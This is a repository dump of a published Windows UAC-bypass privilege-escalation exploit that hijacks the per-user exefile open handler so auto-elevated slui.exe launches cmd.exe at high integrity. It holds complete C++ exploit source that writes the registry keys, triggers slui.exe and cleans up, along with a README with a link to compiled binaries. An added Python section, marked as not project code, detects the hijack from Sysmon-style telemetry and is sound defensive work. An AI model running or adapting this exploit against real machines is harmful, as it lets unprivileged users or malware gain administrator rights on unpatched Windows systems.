├── .gitignore
├── SluiFileHandlerHijackLPE
│   ├── SluiFileHandlerHijackLPE.vcxproj.filters
│   ├── SluiFileHandlerHijackLPE.cpp
│   └── SluiFileHandlerHijackLPE.vcxproj
├── LICENSE.md
├── README.md
└── SluiFileHandlerHijackLPE.sln

/.gitignore:
--------------------------------------------------------------------------------
```gitignore
.vs/
bin/
obj/
Debug/
Release/
ipch/
TestResults/
*.suo
*.user
*.sdf
*.opensdf
*.opendb
*.VC.db
*.aps
[Tt]humbs.db
*~*.xlsx
*~*.docx

$Build/
```

/SluiFileHandlerHijackLPE/SluiFileHandlerHijackLPE.vcxproj.filters:
--------------------------------------------------------------------------------
(XML element names were stripped in extraction; nothing else of this filter file survives.)

/LICENSE.md:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2018 bytecode77

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

/README.md:
--------------------------------------------------------------------------------
# Slui File Handler Hijack LPE

| Exploit Information | |
|:------------------- |:--------------------------------- |
| Date | 15.01.2018 |
| Patched | Windows 10 20H1 (19041) |
| exploit-db | [44830](https://www.exploit-db.com/exploits/44830/) |
| Tested on | Windows 8-10, x86/x64 independent |

## Description

slui.exe is an auto-elevated binary that is vulnerable to file handler hijacking.

Read access to HKCU\Software\Classes\exefile\shell\open is performed upon execution. Because this registry key is writable from user mode, an arbitrary executable can be injected as the handler.

This exploit is generally independent of programming language and bitness, as no DLL injection or privileged file copy is needed. In addition, if default system binaries suffice, file drops can be avoided altogether.

## Expected Result

When everything has worked correctly, a cmd.exe should be spawned with high IL.
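From a defender's side, the description above gives two observable signals: a write to the per-user `exefile` open handler (a key that does not exist on a stock workstation) and, shortly afterwards, a high-integrity child of the auto-elevated slui.exe. The Python below is an added example and not part of the bytecode77 project. It runs that correlation over constructed, Sysmon-shaped records (EventID 13 = registry value set, EventID 1 = process create; the SIDs, user names and timestamps are made up) and includes a live check of HKCU for the current user on a Windows host. The assumption that the payload appears as a high-IL child of slui.exe follows from the README's statement that cmd.exe is spawned with high IL.

```python
"""Detection logic for a per-user exefile handler hijack (added example,
not project code). Sample telemetry is constructed; field names follow
Sysmon's schema, the values are invented for illustration."""
from __future__ import annotations

import re
from typing import Iterable, Optional

# slui.exe consults the per-user class under HKCU; Sysmon logs HKCU as HKU\<SID>.
# A stock workstation has no exefile ProgID in the user hive at all, so any
# write to this path deserves a look.
HIJACK_KEY_RE = re.compile(
    r"^(HKU\\S-1-5-21-[\d-]+|HKCU)\\Software\\Classes\\exefile\\shell\\open\\command(\\.*)?$",
    re.IGNORECASE,
)

# Auto-elevated parents whose high-IL children are interesting. The page documents
# slui.exe; the set is left open for an analyst to extend.
AUTO_ELEVATED_PARENTS = {"slui.exe"}


def is_user_exefile_handler_write(event: dict) -> bool:
    """True for a registry value-set event that targets the per-user exefile handler."""
    if event.get("EventID") != 13:
        return False
    return HIJACK_KEY_RE.match(event.get("TargetObject", "")) is not None


def is_high_il_child_of_auto_elevated(event: dict) -> bool:
    """True for a process-create event with an auto-elevated parent and High integrity."""
    if event.get("EventID") != 1:
        return False
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    return parent in AUTO_ELEVATED_PARENTS and event.get("IntegrityLevel") == "High"


def detect(events: Iterable[dict], window_seconds: int = 60) -> list[dict]:
    """Walk events in time order and emit alerts.

    A handler write on its own is medium severity (a portable app might register
    one by mistake); a write followed within window_seconds by a high-IL child of
    slui.exe for the same user is high severity."""
    alerts: list[dict] = []
    last_write: dict[str, dict] = {}
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        user = ev.get("User", "")
        if is_user_exefile_handler_write(ev):
            last_write[user] = ev
            alerts.append({"severity": "medium", "user": user,
                           "reason": "per-user exefile open handler written",
                           "handler": ev.get("Details")})
        elif is_high_il_child_of_auto_elevated(ev):
            write = last_write.get(user)
            if write is not None and ev["UtcTime"] - write["UtcTime"] <= window_seconds:
                alerts.append({"severity": "high", "user": user,
                               "reason": "high-IL child of auto-elevated slui.exe after handler write",
                               "handler": write.get("Details"), "spawned": ev.get("Image")})
    return alerts


def local_user_exefile_handler() -> Optional[str]:
    """Live check on a Windows host: the (Default) command under
    HKCU\\Software\\Classes\\exefile\\shell\\open\\command, or None if absent.
    Returns None on non-Windows hosts, where winreg does not exist."""
    try:
        import winreg
    except ImportError:
        return None
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER,
                            r"Software\Classes\exefile\shell\open\command") as key:
            value, _ = winreg.QueryValueEx(key, "")
            return str(value)
    except OSError:
        return None


# Constructed sample telemetry: one hijack sequence by "alice", benign noise from "bob".
SAMPLE_EVENTS = [
    {"EventID": 13, "UtcTime": 100, "User": r"LAB\alice",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes\exefile\shell\open\command\(Default)",
     "Details": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "UtcTime": 101, "User": r"LAB\alice", "Image": r"C:\Windows\System32\slui.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "IntegrityLevel": "High"},
    {"EventID": 1, "UtcTime": 102, "User": r"LAB\alice", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\slui.exe", "IntegrityLevel": "High"},
    # benign: a portable editor registering a per-user .txt handler (different ProgID)
    {"EventID": 13, "UtcTime": 200, "User": r"LAB\bob",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1002\Software\Classes\txtfile\shell\open\command\(Default)",
     "Details": r"C:\Tools\editor.exe"},
    # benign: slui.exe opened normally, no handler write and no child process
    {"EventID": 1, "UtcTime": 300, "User": r"LAB\bob", "Image": r"C:\Windows\System32\slui.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "IntegrityLevel": "High"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
    print("live HKCU handler:", local_user_exefile_handler())
```

The registry match is keyed on the ProgID rather than on slui.exe, so it also catches the same hijack aimed at any other auto-elevated binary that resolves `exefile` through the user hive; widen `AUTO_ELEVATED_PARENTS` if your telemetry shows other such parents. On a patched build (20H1 and later, per the table above) the write may still occur but the high-severity pairing should not.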
## Downloads

Compiled binaries:

[![](http://bytecode77.com/public/fileicons/zip.png) SluiFileHandlerHijackLPE.zip](https://downloads.bytecode77.com/SluiFileHandlerHijackLPE.zip)
(**ZIP Password:** bytecode77)

## Project Page

[![](https://bytecode77.com/public/favicon16.png) bytecode77.com/slui-file-handler-hijack-privilege-escalation](https://bytecode77.com/slui-file-handler-hijack-privilege-escalation)

/SluiFileHandlerHijackLPE.sln:
--------------------------------------------------------------------------------
```
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.27130.2010
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SluiFileHandlerHijackLPE", "SluiFileHandlerHijackLPE\SluiFileHandlerHijackLPE.vcxproj", "{CF9EE248-E537-43C2-8886-C54E51430F02}"
EndProject
Global
	GlobalSection(SolutionConfigurationPlatforms) = preSolution
		Debug|x64 = Debug|x64
		Debug|x86 = Debug|x86
		Release|x64 = Release|x64
		Release|x86 = Release|x86
	EndGlobalSection
	GlobalSection(ProjectConfigurationPlatforms) = postSolution
		{CF9EE248-E537-43C2-8886-C54E51430F02}.Debug|x64.ActiveCfg = Debug|x64
		{CF9EE248-E537-43C2-8886-C54E51430F02}.Debug|x64.Build.0 = Debug|x64
		{CF9EE248-E537-43C2-8886-C54E51430F02}.Debug|x86.ActiveCfg = Debug|Win32
		{CF9EE248-E537-43C2-8886-C54E51430F02}.Debug|x86.Build.0 = Debug|Win32
		{CF9EE248-E537-43C2-8886-C54E51430F02}.Release|x64.ActiveCfg = Release|x64
		{CF9EE248-E537-43C2-8886-C54E51430F02}.Release|x64.Build.0 = Release|x64
		{CF9EE248-E537-43C2-8886-C54E51430F02}.Release|x86.ActiveCfg = Release|Win32
		{CF9EE248-E537-43C2-8886-C54E51430F02}.Release|x86.Build.0 = Release|Win32
	EndGlobalSection
	GlobalSection(SolutionProperties) = preSolution
		HideSolutionNode = FALSE
	EndGlobalSection
	GlobalSection(ExtensibilityGlobals) = postSolution
		SolutionGuid = {AA468A55-1A3A-4469-A776-52B7578A0E7A}
	EndGlobalSection
EndGlobal
```

/SluiFileHandlerHijackLPE/SluiFileHandlerHijackLPE.cpp:
--------------------------------------------------------------------------------
```cpp
/*
 * Slui File Handler Hijack UAC Bypass Local Privilege Escalation
 *
 * Discovered by bytecode77 (https://bytecode77.com)
 *
 * Full Download:
 * https://bytecode77.com/slui-file-handler-hijack-privilege-escalation
 *
 * slui.exe is an auto-elevated binary that is vulnerable to file handler
 * hijacking.
 *
 * Read access to HKCU\Software\Classes\exefile\shell\open is performed upon
 * execution. Due to the registry key being accessible from user mode, an arbitrary
 * executable file can be provided.
 *
 * This exploit is generally independent from programming language and bitness, as
 * no DLL injection or privileged file copy is needed. In addition, if default
 * system binaries suffice, file drops can be avoided altogether.
 */

#include <Windows.h>
#include <string>
using namespace std;

void CreateRegistryKey(HKEY key, wstring path, wstring name);
void DeleteRegistryKey(HKEY key, wstring path, wstring name);
void SetRegistryValue(HKEY key, wstring path, wstring name, wstring value);

int CALLBACK WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
	// Create Class "exefile" in HKCU

	// HKEY_CURRENT_USER
	//   Software
	//     Classes
	//       exefile
	//         shell
	//           open
	//             command
	//               @=Payload   <-- cmd.exe is used here, can be any executable

	// Create registry tree
	CreateRegistryKey(HKEY_CURRENT_USER, L"Software\\Classes", L"exefile");
	CreateRegistryKey(HKEY_CURRENT_USER, L"Software\\Classes\\exefile", L"shell");
	CreateRegistryKey(HKEY_CURRENT_USER, L"Software\\Classes\\exefile\\shell", L"open");
	CreateRegistryKey(HKEY_CURRENT_USER, L"Software\\Classes\\exefile\\shell\\open", L"command");

	// Set payload to cmd.exe
	// Any executable can be used. File drops can, however, be avoided completely if system binaries suffice.
	SetRegistryValue(HKEY_CURRENT_USER, L"Software\\Classes\\exefile\\shell\\open\\command", L"", L"C:\\Windows\\System32\\cmd.exe");

	// Start slui.exe with "runas" verb
	ShellExecuteW(NULL, L"runas", L"C:\\Windows\\System32\\slui.exe", NULL, NULL, SW_SHOWNORMAL);

	// Wait some time until it finished loading
	Sleep(1000);

	// Delete registry keys, but only from \Software\Classes\exefile\shell to not interfere with other application handlers
	DeleteRegistryKey(HKEY_CURRENT_USER, L"Software\\Classes\\exefile\\shell\\open", L"command");
	DeleteRegistryKey(HKEY_CURRENT_USER, L"Software\\Classes\\exefile\\shell", L"open");
	return 0;
}

void CreateRegistryKey(HKEY key, wstring path, wstring name)
{
	HKEY hKey;
	if (RegOpenKeyExW(key, path.c_str(), 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS && hKey != NULL)
	{
		HKEY hKeyResult;
		RegCreateKeyW(hKey, name.c_str(), &hKeyResult);
		RegCloseKey(hKey);
	}
}
void DeleteRegistryKey(HKEY key, wstring path, wstring name)
{
	HKEY hKey;
	if (RegOpenKeyExW(key, path.c_str(), 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS && hKey != NULL)
	{
		RegDeleteKeyW(hKey, name.c_str());
		RegCloseKey(hKey);
	}
}
void SetRegistryValue(HKEY key, wstring path, wstring name, wstring value)
{
	HKEY hKey;
	if (RegOpenKeyExW(key, path.c_str(), 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS && hKey != NULL)
	{
		RegSetValueExW(hKey, name.c_str(), 0, REG_SZ, (BYTE*)value.c_str(), ((DWORD)wcslen(value.c_str()) + 1) * sizeof(wchar_t));
		RegCloseKey(hKey);
	}
}
```

/SluiFileHandlerHijackLPE/SluiFileHandlerHijackLPE.vcxproj:
--------------------------------------------------------------------------------
(MSBuild element names were stripped from this project file in extraction; only the values survive.) Recoverable settings: configurations Debug|Win32, Release|Win32, Debug|x64 and Release|x64; project version 15.0; project GUID {CF9EE248-E537-43C2-8886-C54E51430F02}; root namespace SluiFileHandlerHijackLPE; Windows SDK 10.0.16299.0; Application type; toolset v141; MultiByte character set. Debug builds use warning level Level3, optimization Disabled and the MultiThreadedDebug runtime; Release builds use MaxSpeed and the MultiThreaded runtime. All four configurations share this post-build step:

```bat
mkdir "$(SolutionDir)$Build"
mkdir "$(SolutionDir)$Build\$(PlatformShortName)"
xcopy /Y "$(TargetPath)" "$(SolutionDir)$Build\$(PlatformShortName)"
```